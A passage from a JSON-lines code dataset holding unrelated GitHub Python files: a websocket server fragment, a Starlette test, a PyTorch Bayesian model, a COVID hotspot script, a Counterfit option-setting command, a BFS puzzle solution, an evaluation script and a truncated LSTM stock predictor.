None:\n print(\"Connection Over :(\", self.client_address[0])\n\n\nif __name__ == '__main__':\n socketserver.TCPServer.allow_reuse_address = True\n server = socketserver.ThreadingTCPServer((\"127.0.0.1\", 2449), Handler)\n server.serve_forever()\n", "repo_name": "kushurox/Secr3t", "sub_path": "websockets/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.findall", "line_number": 59, "usage_type": "call"}, {"api_name": "socketserver.BaseRequestHandler", "line_number": 64, "usage_type": "attribute"}, {"api_name": "hashlib.sha1", "line_number": 72, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 73, "usage_type": "call"}, {"api_name": "socketserver.TCPServer", "line_number": 96, "usage_type": 
"attribute"}, {"api_name": "socketserver.ThreadingTCPServer", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "11958105157", "text": "from starlette import status\nfrom starlette.testclient import TestClient\n\nfrom api.main import api\nfrom tests.utils import assert_dicts\n\n\ndef test_health(\n client: TestClient,\n) -> None:\n response = client.get(\n url=\"/health\",\n )\n assert response.status_code == status.HTTP_200_OK\n expected = dict(\n message=f\"{api.title} - OK\",\n version=api.version,\n time=\"*\",\n )\n assert_dicts(original=response.json(), expected=expected)\n", "repo_name": "txemac/ecgs-service", "sub_path": "tests/test_main.py", "file_name": "test_main.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "starlette.testclient.TestClient", "line_number": 9, "usage_type": "name"}, {"api_name": "starlette.status.HTTP_200_OK", "line_number": 14, "usage_type": "attribute"}, {"api_name": "starlette.status", "line_number": 14, "usage_type": "name"}, {"api_name": "api.main.api.title", "line_number": 16, "usage_type": "attribute"}, {"api_name": "api.main.api", "line_number": 16, "usage_type": "name"}, {"api_name": "api.main.api.version", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api.main.api", "line_number": 17, "usage_type": "name"}, {"api_name": "tests.utils.assert_dicts", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "28282063496", "text": "import math\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom src.utils import set_device\nfrom torch.distributions import Normal\n\n\nclass BaseModel(nn.Module):\n \"\"\"\n Base model that implements common methods to all models.\n \"\"\"\n def __init__(\n self,\n n_train,\n sigma_b=1.,\n sigma_w=1.,\n sigma_default=1.,\n scale_sigma_w_by_dim=False,\n use_prior=False, \n device='cuda'\n ):\n super().__init__()\n self.n_train = n_train\n self.sigma_b = sigma_b\n self.sigma_w = sigma_w\n self.sigma_default = sigma_default\n self.scale_sigma_w_by_dim = scale_sigma_w_by_dim\n self.use_prior = use_prior\n self.device = set_device(device)\n\n # nn.Modules in order of execution in forward pass\n self.ordered_modules = nn.ModuleList()\n\n # Initialize prior distributions (also call this method when model\n # has been defined properly)\n self.init_prior_dist() \n\n\n def init_prior_dist(self):\n \"\"\"\n Initializes prior distributions.\n \"\"\"\n mean = torch.tensor(0, device=self.device)\n sigma_b = torch.tensor(self.sigma_b, device=self.device)\n sigma_w = torch.tensor(self.sigma_w, device=self.device)\n sigma_default = torch.tensor(self.sigma_default, device=self.device)\n\n # Default prior distribution\n self.prior_dist_default = Normal(loc=mean, scale=sigma_default)\n\n # Prior distribution of biases\n self.prior_dist_bias = Normal(loc=mean, scale=sigma_b)\n\n # Prior distributions of weights (might depend on input dim to layer)\n self.prior_dist_weight = dict()\n\n for name, param in self.named_parameters():\n if 'weight' in name:\n sigma = torch.clone(sigma_w)\n dim_in = param.shape[1] if param.dim() > 1 else 1\n if self.scale_sigma_w_by_dim:\n sigma = sigma / math.sqrt(dim_in)\n self.prior_dist_weight[dim_in] = Normal(loc=mean, scale=sigma)\n\n\n def forward(self, x):\n \"\"\"\n Implements forward pass using \"ordered_modules\" attribute.\n \"\"\"\n for module in self.ordered_modules:\n x = module(x)\n return x\n\n\n def log_prior(self):\n \"\"\"\n Prior distribution over weights.\n \"\"\"\n prior = 0.\n if self.use_prior:\n for name, param in self.named_parameters():\n if 'bias' in name:\n prior += self.prior_dist_bias.log_prob(param).sum()\n elif 'weight' in name:\n dim_in = param.shape[1] if param.dim() > 1 else 1\n prior += self.prior_dist_weight[dim_in].log_prob(param).sum()\n else:\n prior += self.prior_dist_default.log_prob(param).sum()\n\n return prior\n\n \n def log_density(self, model_output, target):\n \"\"\"\n Log probability of single data point.\n \"\"\"\n raise NotImplementedError\n \n\n def log_likelihood(self, model_output, target):\n \"\"\"\n Log likelihood.\n \"\"\"\n return self.log_density(model_output, target).sum()\n \n\n def log_joint(self, model_output, target):\n \"\"\"\n Log joint distribution.\n \"\"\"\n return self.log_likelihood(model_output, target) + self.log_prior()\n\n\n def loss(self, model_output, target):\n \"\"\"\n Loss is the scaled negative log joint distribution.\n \"\"\"\n return (\n -self.log_likelihood(model_output, target)/len(target) \n - self.log_prior()/self.n_train\n )\n #return (\n # -self.log_likelihood(model_output, target)\n # - len(target)*self.log_prior()/self.n_train\n #)\n\n\n def optimizer(self, weight_decay=0, lr=1e-3):\n \"\"\"\n Default optimizer.\n \"\"\"\n optimizer = Adam(self.parameters(), weight_decay=weight_decay, lr=lr)\n\n return optimizer", "repo_name": "jonasvj/active-learning", "sub_path": "src/models/base_model.py", "file_name": "base_model.py", "file_ext": 
"py", "file_size_in_byte": 4016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "src.utils.set_device", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.clone", "line_number": 60, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.distributions.Normal", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 133, "usage_type": "call"}]}
+{"seq_id": "38267469925", "text": "import json , urllib.request, operator\nfrom external import extract_element_from_json, unique, GetTop10Districts, GetDates, GetRawData, cleanRawData , GetTopTrends , GetCSVfromDict\nfrom collections import Counter\nimport itertools\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nrawData = GetRawData() # Make API call to get raw case data\nrawData = cleanRawData(rawData) # Clean data to fix Delhi issue\ncases = rawData.get('raw_data',{}) # Get info about all cases\ncityTrends = GetTopTrends(rawData) # Get info about top 10 cities. City and dates with cases (no frequency)\nCityTrendsDailyFreq = {} # initialize a dictionary to hold daily frequency data\ncnt = Counter() # initalize counter to calculate daily frequency data\nd = np.array([]) # initialize numpy array to hold weekly data ('city', week number, # of cases)\n\n# Loop through CityTrends and generate daily count \nfor city in cityTrends :\n cnt = Counter(cityTrends[city])\n CityTrendsDailyFreq[city] = dict(cnt)\n#print(CityTrendsDailyFreq)\n# Loop through daily count and generate weekly count -- not perfect. In some cases, there will multiple entries for each week. Need to add when we generate report \naList = []\nfor i in CityTrendsDailyFreq.keys() : \n for key,value in CityTrendsDailyFreq[i].items() :\n a_date = datetime.strptime(key,'%d/%m/%Y')\n week_number = a_date.isocalendar()[1]\n #d = np.append(d,[[i,week_number,value]])\n #d = np.append(d,list([i,week_number,value]))\n aList.append([i,int(week_number),int(value)])\n\nfor current, nex in zip(aList, aList[1:]): \n if nex[0] == current[0] :\n #print(current[0], next[0])\n #print(\"in\") \n if nex[1] == current[1]:\n nex[2] = nex[2] + current[2]\n current[0] = '0'\n current[1] = 0\n current[2] = 0\nprint(aList)\n\n# Create nested dictionary in thr format: {Week Number: {{Hotspot 1: count}, {Hotspot 2: count}}}\nWeeks = list(range(0,53))\nWeeklyHotspots = {} \nTop10CitiesList = GetTop10Districts(rawData)\nTop10CitiesList.remove(\"\")\n#print(Top10CitiesList)\nfor week in Weeks:\n WeeklyHotspots.update({'week' + str(week) :{'null': 0}})\nfor week in Weeks:\n for Top10City in Top10CitiesList: \n WeeklyHotspots['week' + str(week)][Top10City] = 0\nfor week in Weeks:\n WeeklyHotspots.update({week :{}})\n for a in aList: \n WeeklyHotspots['week'+str(a[1])][a[0]] = a[2]\n\n# Export Weekly Frequency data to CSV \nwith open(\"WeeklyHotspots.csv\", 'w') as f:\n for key in WeeklyHotspots.keys():\n f.write(\"%s,%s\\n\"%(key,WeeklyHotspots[key]))", "repo_name": "sanAnand/COVID19India-States-Districts", "sub_path": "HotSpotWeeklyFreq.py", "file_name": "HotSpotWeeklyFreq.py", "file_ext": "py", "file_size_in_byte": 2673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "external.GetRawData", "line_number": 11, "usage_type": "call"}, {"api_name": "external.cleanRawData", "line_number": 12, "usage_type": "call"}, {"api_name": "external.GetTopTrends", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": 
"external.GetTop10Districts", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "5415164270", "text": "import argparse\nfrom cmd2 import with_argparser\nfrom cmd2 import with_category\nfrom rich.table import Table\nfrom counterfit.core.state import CFState\nfrom counterfit.core.output import CFPrint\nfrom typing import Union\n\n\ndef set_table(default_options, current_options, new_options):\n default_options_list = CFState.state(\n ).active_target.active_attack.options.default_options_list\n\n cfattack_options_list = CFState.state(\n ).active_target.active_attack.options.cfattack_options_list\n\n table = Table(header_style=\"bold magenta\")\n table.add_column(\"Parameter (type)\")\n table.add_column(\"Default\")\n table.add_column(\"Current\")\n table.add_column(\"New\")\n\n # print attack params first\n table.add_row(\"Algorithm Parameters\")\n table.add_row(\"--------------------\", \"--\", \"--\", \"--\")\n for option in default_options_list:\n default_value = default_options.get(option)\n current_value = current_options.get(option)\n new_value = new_options.get(option, \"-\")\n\n if new_value != current_value:\n table.add_row(f\"{option} ({str(type(default_value).__name__)})\",\n str(default_value), str(current_value), str(new_value))\n else:\n table.add_row(f\"{option} ({str(type(default_value).__name__)})\",\n str(default_value), str(current_value), \" \")\n\n # print cfspecific options next\n table.add_row()\n table.add_row(\"Attack Options\")\n table.add_row(\"--------------------\", \"--\", \"--\", \"--\")\n for option in cfattack_options_list:\n default_value = default_options.get(option)\n current_value = current_options.get(option)\n new_value = new_options.get(option, \"-\")\n\n if \"sample_index\" == option:\n parameter_type = \"int or expr\"\n else:\n parameter_type = str(type(default_value).__name__)\n\n if new_value != current_value:\n table.add_row(f\"{option} ({parameter_type})\",\n str(default_value), str(current_value), str(new_value))\n else:\n table.add_row(f\"{option} ({parameter_type})\",\n str(default_value), str(current_value), \" \")\n\n CFPrint.output(table)\n\n\ndef get_options() -> list:\n # dynamically get the list of options\n if not CFState.state().active_target:\n options = {}\n elif not CFState.state().active_target.active_attack:\n options = {}\n elif CFState.state().active_target.active_attack and hasattr(CFState.state().active_target.active_attack, 'options'):\n options = CFState.state().active_target.active_attack.options.get_all_options()\n else:\n options = {}\n return options\n\ndef get_sample_index(sample_index: str) -> Union[list, int, range, None]:\n try:\n sample_index = eval(sample_index)\n except Exception as e:\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}: {e}\")\n return None\n\n if type(sample_index) is tuple:\n sample_index = list(sample_index)\n\n if type(sample_index) not in (range, int, list):\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}: expression must result in a 'list', 'range' or 'int'\")\n return None\n\n if type(sample_index) is list:\n if any([type(el) is not int for el in sample_index]):\n CFPrint.failed(f\"Error parsing '--sample_index {sample_index}': list must only contain integers\")\n return None\n \n return sample_index\n\nNoneType = type(None)\ndef get_clip_values(clip_values: str) -> Union[tuple,NoneType]:\n try:\n clip_values = eval(clip_values)\n except Exception as e:\n CFPrint.failed(f\"Error parsing '--clip_values {clip_values}': {e}\")\n return None\n\n if clip_values is None:\n return \"None\"\n\n if type(clip_values) not in (tuple,):\n 
CFPrint.failed(f\"Error parsing '--clip_values {clip_values}: expression must result in a 'tuple' or 'None'\")\n return None\n\n return clip_values\n\n\ndef parse_numeric(argname: str, val_str: str) -> Union[int, float, None]:\n # simple check for \"inf\" as a shortcut to float('inf)\n if type(val_str) is str and val_str == \"inf\":\n return float('inf')\n try:\n val = eval(val_str)\n except Exception as e:\n CFPrint.failed(f\"Error parsing --'{argname} {val_str}': {e}\")\n return None\n\n if type(val) not in (int, float):\n CFPrint.failed(f\"Error parsing '--{argname} {val_str}': expression must result in a 'int' or 'float'\")\n return None\n\n return val\n\n\ndef parse_boolean(argname: str, val_str: str) -> Union[bool, None]:\n if val_str.lower() in (\"true\", \"t\", \"yes\", \"y\", \"1\"):\n return True\n elif val_str.lower() in (\"false\", \"f\", \"no\", \"n\", \"0\"):\n return False\n else:\n CFPrint.failed(f\"Error parsing '--{argname} {val_str}': must be 'true' or 'false'\")\n return None\n\n\n# dynamic option add\nparser = argparse.ArgumentParser()\nfor option, value in get_options().items():\n if \"sample_index\" == option or \"clip_values\" == option:\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n elif type(value) in (float, int):\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n elif type(value) == bool:\n parser.add_argument(f\"--{option}\", type=str, default=str(value))\n else:\n parser.add_argument(\n f\"--{option}\", type=type(value), default=value)\n\n\ndef update_options(target, partial_options):\n default_options = target.active_attack.options.previous_options[0]\n current_options = target.active_attack.options.get_all_options()\n new_options = current_options.copy()\n\n new_options = {}\n for option, val in partial_options.items():\n if type(val) is bool and val: # toggle boolean values\n val = not current_options.get(option)\n new_options[option] = val\n\n target.active_attack.options.set_options(new_options)\n\n return default_options, current_options, new_options\n\n\n@with_argparser(parser)\n@with_category(\"Counterfit Commands\")\ndef do_set(self, args: argparse.Namespace) -> None:\n \"\"\"Set parameters of the active attack on the active target using \n --param1 val1 --param2 val2.\n\n For infinity, use 'inf' or 'float(\"inf\")'.\n\n This command replaces built-in \"set\" command, which is renamed to \"setg\".\n \"\"\"\n target = CFState.state().get_active_target()\n if not target:\n CFPrint.warn(\"No active target. Try 'interact '\")\n return\n\n if not target.get_active_attack():\n CFPrint.warn(\"No active attack. 
Try 'use '\")\n return\n\n default_options = target.active_attack.options.previous_options[0]\n\n for argname, argval in args.__dict__.items():\n if argname == 'clip_values':\n clip_values = get_clip_values(args.clip_values)\n if clip_values is None:\n return\n if clip_values==\"None\": # None is a valid type we handle separately\n clip_values = None\n args.clip_values = clip_values\n elif argname == 'sample_index':\n sample_index = get_sample_index(args.sample_index)\n if sample_index is None:\n return\n args.sample_index = sample_index\n elif type(default_options.get(argname)) in (float, int) and type(argval) is str:\n # parse numeric type\n argval = parse_numeric(argname, argval)\n if argval is None:\n return\n args.__dict__[argname] = argval\n elif type(default_options.get(argname)) is bool:\n # parse boolean type\n argval = parse_boolean(argname, argval)\n if argval is None:\n return\n args.__dict__[argname] = argval\n\n default_options, current_options, new_options = update_options(target, args.__dict__)\n\n set_table(default_options, current_options, new_options)\n", "repo_name": "popoolasubomi/AIV", "sub_path": "counterfit/counterfit/commands/set.py", "file_name": "set.py", "file_ext": "py", "file_size_in_byte": 7942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "counterfit.core.state.CFState.state", "line_number": 11, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 11, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 14, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 14, "usage_type": "name"}, {"api_name": "rich.table.Table", "line_number": 17, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint.output", "line_number": 59, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 59, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 64, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 64, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 66, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 66, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 68, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 68, "usage_type": "name"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 69, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 69, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 78, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 78, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 85, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 85, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 90, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 100, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 100, "usage_type": "name"}, {"api_name": 
"counterfit.core.output.CFPrint.failed", "line_number": 107, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 120, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 120, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 124, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 113, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.failed", "line_number": 136, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 172, "usage_type": "attribute"}, {"api_name": "counterfit.core.state.CFState.state", "line_number": 180, "usage_type": "call"}, {"api_name": "counterfit.core.state.CFState", "line_number": 180, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.warn", "line_number": 182, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 182, "usage_type": "name"}, {"api_name": "counterfit.core.output.CFPrint.warn", "line_number": 186, "usage_type": "call"}, {"api_name": "counterfit.core.output.CFPrint", "line_number": 186, "usage_type": "name"}, {"api_name": "cmd2.with_argparser", "line_number": 170, "usage_type": "call"}, {"api_name": "cmd2.with_category", "line_number": 171, "usage_type": "call"}]}
+{"seq_id": "3320937572", "text": "# BOJ 7569번 문제: 토마토\n# Using BFS because its more efficient in finding solutions nearby a source\nfrom collections import deque\ndef solution():\n M, N, H = map(int, input().split())\n box = []\n\n dx, dy, dz = [-1, 1, 0, 0, 0, 0], [0, 0, -1, 1, 0, 0], [0, 0, 0, 0, -1, 1]\n answer = 0\n\n for h in range(H):\n layer = []\n for n in range(N):\n row = list(map(int, input().split()))\n layer.append(row)\n box.append(layer)\n\n queue = deque([])\n for ___ in range(H):\n for _ in range(N):\n for __ in range(M):\n if box[___][_][__] == 1:\n queue.append([___, _, __])\n\n while queue:\n z, x, y = queue.popleft()\n for j in range(6):\n nz, nx, ny = dz[j] + z, dx[j] + x, dy[j] + y\n if 0 <= nx < N and 0 <= ny < M and 0 <= nz < H and box[nz][nx][ny] == 0:\n box[nz][nx][ny] = box[z][x][y] + 1\n queue.append([nz, nx, ny])\n\n for i in box:\n for j in i:\n for k in j:\n if k == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(j))\n\n print(answer - 1)\n\nif '__main__' == __name__:\n solution()", "repo_name": "KKodiac/Python", "sub_path": "BOJ/DFS_BFS/7569.py", "file_name": "7569.py", "file_ext": "py", "file_size_in_byte": 1242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "30883317699", "text": "# >>>\nif __name__ == '__main__':\n import os\n import sys\n\n _project_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n os.environ['PROJECT_DIR'] = _project_dir\n sys.path.append(_project_dir)\n del _project_dir\n# <<<\n\nimport shutil\nfrom copy import deepcopy\nfrom pathlib import Path\nfrom typing import Optional\n\nimport lib\n\n\ndef main(\n path: Path,\n n_seeds: int = 15,\n function: Optional[str] = None,\n *,\n force: bool = False,\n):\n path = lib.get_path(path)\n if path.name.endswith('-tuning'):\n from_tuning = True\n assert function is None\n assert (path / 'DONE').exists()\n\n tuning_report = lib.load_report(path)\n function_qualname = tuning_report['config']['function']\n template_config = tuning_report['best']['config']\n\n path = path.with_name(path.name.replace('tuning', 'evaluation'))\n path.mkdir(exist_ok=True)\n else:\n from_tuning = False\n assert path.name.endswith('-evaluation')\n assert function is not None\n function_qualname = function\n template_config = lib.load_config(path / '0.toml')\n\n function_: lib.Function = lib.import_(function_qualname)\n for seed in range(n_seeds):\n config = deepcopy(template_config)\n config['seed'] = seed\n if 'catboost' in function_qualname:\n if config['model']['task_type'] == 'GPU':\n config['model']['task_type'] = 'CPU' # this is crucial for good results\n thread_count = config['model'].get('thread_count', 1)\n config['model']['thread_count'] = max(thread_count, 4)\n config_path = path / f'{seed}.toml'\n try:\n if seed > 0 or from_tuning:\n lib.dump_config(config, config_path)\n function_(config, config_path.with_suffix(''), force=force)\n except Exception:\n if seed > 0 or from_tuning:\n config_path.unlink(True)\n shutil.rmtree(config_path.with_suffix(''), True)\n raise\n\n\nif __name__ == '__main__':\n lib.configure_libraries()\n lib.run_cli(main)\n", "repo_name": "yandex-research/tabular-dl-tabr", "sub_path": "bin/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 167, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.get_path", "line_number": 27, "usage_type": "call"}, {"api_name": "lib.load_report", "line_number": 33, "usage_type": "call"}, {"api_name": "lib.load_config", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.Function", "line_number": 46, "usage_type": "attribute"}, {"api_name": "lib.import_", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 48, "usage_type": "call"}, {"api_name": "lib.dump_config", "line_number": 58, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 63, "usage_type": "call"}, {"api_name": "lib.configure_libraries", "line_number": 68, "usage_type": "call"}, {"api_name": "lib.run_cli", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "30663921302", "text": "# -*- coding: utf-8 -*-\n\n# Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Importing the training set\ndataset_train = pd.read_csv('Google_Stock_Price_Train.csv')\ntraining_set = dataset_train.iloc[:, 1:2].values\n\n# Feature Scaling (Normalização, Padronização)\n# OBS: Irei testar padronização nos dados, usando o StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nmms = MinMaxScaler(feature_range=(0, 1))\ntraining_set_scaled = mms.fit_transform(training_set)\n\n# Creating a data structure with 60 timesteps and 1 output\nX_train = []\ny_train = []\nfor i in range(60, 1258):\n X_train.append(training_set_scaled[i-60:i])\n y_train.append(training_set_scaled[i])\nX_train, y_train = np.array(X_train), np.array(y_train)\n\n# Part 2 - Building the RNN\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\n# Initialising the RNN\nregressor = Sequential()\n\n# Adding the first LSTM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True, input_shape=(X_train.shape[1], 1)))\nregressor.add(Dropout(.2))\n\n# Adding a secund LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a third LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100, return_sequences=True))\nregressor.add(Dropout(.2))\n\n# Adding a fourth LTSM layer and some Dropout regularization\nregressor.add(LSTM(units=100))\nregressor.add(Dropout(.2))\n\n# Adding the output layer\nregressor.add(Dense(units=1))\n\n# Compiling the RNN\nregressor.compile(optimizer='adam', loss='mean_squared_error')\n\n# Fitting the RNN to the Training set\nregressor.fit(X_train, y_train, epochs=100, batch_size=32)\n\n\n# Part 3 - Making the predictions and Visualizing the results\n\n# Getting the real stock price of 2017\ndataset_test = pd.read_csv('Google_Stock_Price_Test.csv')\nreal_stock_price = dataset_test.iloc[:, 1:2].values\n\n# Getting the predicted stock price of 2017\ndataset_total = pd.concat((dataset_train.Open, dataset_test.Open), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 60:].values\ninputs = inputs.reshape(-1, 1)\ninputs = mms.fit_transform(inputs)\n\nX_test = []\nfor i in range(60, 80):\n X_test.append(inputs[i-60:i, 0])\nX_test = np.array(X_test)\nX_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))\npredicted_stock_price = regressor.predict(X_test)\npredicted_stock_price = mms.inverse_transform(predicted_stock_price)\n\n# Visualising the result\nimport seaborn as sns\nsns.set_style('darkgrid')\n\nplt.plot(real_stock_price, color='r', label='Real Google Stock Price')\nplt.plot(predicted_stock_price, color='b', label='Predicted Google Stock Price')\nplt.title('Google Stock Price Prediction')\nplt.xlabel('Time')\nplt.ylabel('Google Stock Price')\nplt.legend()\nplt.show()\n\n# Evaluating the RNN\nimport math\nfrom sklearn.metrics import mean_squared_error\nrmse = math.sqrt(mean_squared_error(real_stock_price, 
predicted_stock_price))\n\n# Improving the RNN\n\n'''\nAqui estão diferentes maneiras de melhorar o modelo RNN:\n\n1 - Obtendo mais dados de treinamento: treinamos nosso modelo nos últimos 5 anos do Google Stock Price, \n mas seria ainda melhor treiná-lo nos últimos 10 anos.\n\n2 - Aumentando o número de prazos: o modelo lembrou os preços das ações dos 60 dias financeiros anteriores para prever o preço das ações do dia seguinte. \n Isso porque escolhemos um número de 60 timesteps (3 meses).\n Você poderia tentar aumentar o número de timesteps, \n escolhendo por exemplo 120 timesteps (6 meses). (TESTADO - MODELO PIOROU)\n\n3 - Adicionando alguns outros indicadores: se você tiver o instinto financeiro de que o preço das ações de algumas outras empresas possa estar correlacionado ao do Google, \n você pode adicionar esse outro preço de ação como um novo indicador nos dados de treinamento.\n\n4 - Adicionando mais camadas LSTM: construímos um RNN com quatro camadas LSTM, \n mas você pode tentar ainda mais.(TESTADO - NÃO HOUVE NENHUMA MELHORIA)\n\n5 - Adicionando mais neurônios nas camadas LSTM: destacamos o fato de que precisávamos de um número elevado de neurônios nas camadas LSTM para responder melhor à complexidade do problema e optamos por incluir 50 neurônios em cada uma das nossas 4 camadas LSTM. \n Você poderia tentar uma arquitetura com ainda mais neurônios em cada uma das 4 (ou mais) camadas LSTM. (TESTADO - O MODELO MELHOROU)\n'''\n\n\n# Turning the RNN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Dropout\n\ndef build_classifier(optimizer):\n regressor = Sequential()\n regressor.add(LSTM(units=100, return_sequences=True, input_shape=(X_train.shape[1], 1)))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100, return_sequences=True))\n regressor.add(Dropout(.2))\n \n regressor.add(LSTM(units=100))\n 